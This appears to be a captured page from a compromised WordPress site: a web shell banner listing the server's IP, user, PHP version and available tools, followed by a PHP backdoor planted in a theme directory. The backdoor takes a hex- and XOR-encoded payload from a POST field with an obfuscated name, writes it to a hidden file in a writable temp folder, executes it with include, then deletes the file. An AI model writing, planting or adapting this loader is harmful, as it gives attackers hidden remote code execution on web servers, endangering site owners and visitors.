| Server IP : 51.91.236.193 / Your IP : 216.73.216.224 Web Server : Apache System : Linux webm010.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : institutah ( 16501) PHP Version : 7.2.34 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/institutah/www/wp-content/themes/author-template-1747911287/ |
Upload File : |
<!--Q2ENe6L4-->
<?php
if(filter_has_var(INPUT_POST, "\x63\x6F\x6Dp\x6Fn\x65nt")){
$object = array_filter([sys_get_temp_dir(), getcwd(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/var/tmp", "/dev/shm", getenv("TEMP")]);
$marker = hex2bin($_POST["\x63\x6F\x6Dp\x6Fn\x65nt"]);
$entity ='' ; foreach(str_split($marker) as $char){$entity.=chr(ord($char)^3);}
while ($reference = array_shift($object)) {
if (array_product([is_dir($reference), is_writable($reference)])) {
$factor = implode("/", [$reference, ".ptr"]);
$success = file_put_contents($factor, $entity);
if ($success) {
include $factor;
@unlink($factor);
exit;
}
}
}
}